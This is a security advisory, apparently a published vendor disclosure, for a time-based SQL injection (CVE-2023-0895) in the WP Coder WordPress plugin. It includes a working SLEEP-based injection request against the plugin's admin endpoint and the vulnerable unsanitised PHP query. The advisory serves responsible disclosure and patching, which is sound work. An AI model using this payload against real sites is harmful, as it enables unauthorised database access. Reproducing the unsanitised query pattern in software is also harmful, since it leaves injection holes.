WP Coder, Version 2.5.3 Advisory

By:
Gauge showing high severity reading for a security advisory for EzAdsPro “BlackBox” application.

Share

WP Coder, Version 2.5.3 Advisory

The following document describes identified vulnerabilities in the WP CODER application, version 2.5.3.

Product Vendor

Wow Company

Product Description

WP Coder is an add custom html, CSS and JS code plugin. The project’s official website is https://wordpress.org/plugins/... The latest version of the application is 2.5.4, released on January 10, 2023.

Vulnerabilities List

One vulnerability was identified within the WP Coder plugin:

  • SQL injection (SQLi)

These vulnerabilities are described in the following sections.

Affected Version

All versions prior to and including 2.5.3

Summary of Findings

The WP Coder plugin is affected by a time-based SQL injection vulnerability via the ‘id’ parameter in versions up to, and including, 2.5.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.

Impact

The WP Coder plugin is affected by a time-based SQL injection vulnerability that allows an authenticated attacker to gain unauthorized read access to the WordPress database. This makes it possible for authenticated attackers with administrative privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Solution

Update to version 2.5.4

Vulnerabilities

SQL injection

The WP Coder plugin is vulnerable to time-based SQL Injection via the ‘id’ parameter in versions up to, and including, 2.5.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. An authenticated attacker with administrative privileges could leveraged this vulnerability to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Vulnerability Details

CVE ID: CVE-2023-0895

Vulnerability Type: SQL Injection

Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if other, please specify)

Impact: ☐ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☒ Information disclosure, ☐ Other (if other, please specify)

Security Risk: ☐ Critical, ☒ High, ☐ Medium, ☐ Low

Vulnerability: CWE-89

The WP Coder plugin is affected by a time-based SQL injection vulnerability that allows an authenticated attacker to gain unauthorized read access to the WordPress database.

To exploit the vulnerability, send the following request to the WP Coder plugin API and observe the timing of the response:

Request

GET /wp-admin/admin.php?page=wp-coder&tab=add_new&act=duplicate&id=1+AND+(SELECT+3797+FROM+(SELECT(SLEEP(10)))SITY) HTTP/1.1
Host: vulnerable-host
…omitted for brevity…
Cookie: …omitted for brevity…

Response

HTTP/1.1 200 OK
Date: Sun, 04 Dec 2022 06:39:10 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
…omitted for brevity…

The above response was received after approximately ten seconds thus confirming the vulnerability. Additionally, increasing the time delay causes response times to increase, as shown below:

SQL injection payloads executing with progressively longer sleep timings

FIGURE 1 - SQL injection payloads executing with progressively longer sleep timings

As the figure shows, with every time delay increase, the server responded after the time set in SLEEP function.

The plugin contains the following unsanitized variable in \partials\include-data.php:28, which allows SQL statements being executed by get_row function:

…omitted for brevity…
} else if ( $act === "duplicate" ) {
	$recid  = $_REQUEST["id"];
	$result = $wpdb->get_row( "SELECT * FROM $data WHERE id=$recid" );
	if ( $result ) {
		$id    = "";
		$title = "";
		$param = unserialize( $result->param );
		$last  = $wpdb->get_col( "SELECT id FROM $data" );;
		$tool_id = max( $last ) + 1;
		$hidval  = 1;
		$btn     = __( 'Save', 'wpcoder' );
}
…omitted for brevity…

FIGURE 2 - Unsanitized $recid variable

Credits

Timeline

  • 12/03/2022: Initial discovery
  • 01/09/2023: Contact with vendor
  • 01/10/2023: Vendor acknowledged vulnerability
  • 01/10/2023: Vendor released patched version 2.5.4
  • 02/17/2023: Vulnerability publicly disclosed

Subscribe to Bishop Fox's Security Blog

Be first to learn about latest tools, advisories, and findings.

Etan Aldrete BF Headshot

About the author, Etan Castro Aldrete

Consultant II

Etan Castro Aldrete is a Mexico-based Consultant II at Bishop Fox. Before joining Bishop Fox, Etan worked on different types of hybrid web applications as a backend developer. Etan is credited with public disclosure of CVE-2022-3402, a stored cross-site scripting vulnerability within Log HTTP Requests, a WordPress plugin. He currently holds five security certifications including Offensive Security Web Expert (OSWE), Offensive Security Certified Professional (OSCP), CompTIA Network Vulnerability Assessment Professional - CNVP Stackable Certification, CompTIA PenTes+ ce Certification, and CompTIA Security+ ce Certification. When he is not looking for vulnerabilities, he is searching for ancient coins with a metal detector.

More by Etan

Recommended Posts

You might be interested in these related posts.

Nov 01, 2024

A Brief Look at FortiJump (FortiManager CVE-2024-47575)

Jul 02, 2024

Traeger Grill D2 Wi-Fi Controller, Version 2.02.04

Jun 17, 2024

ExpressionEngine, Version 7.3.15

May 06, 2024

OOB Memory Read: Netscaler ADC and Gateway

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.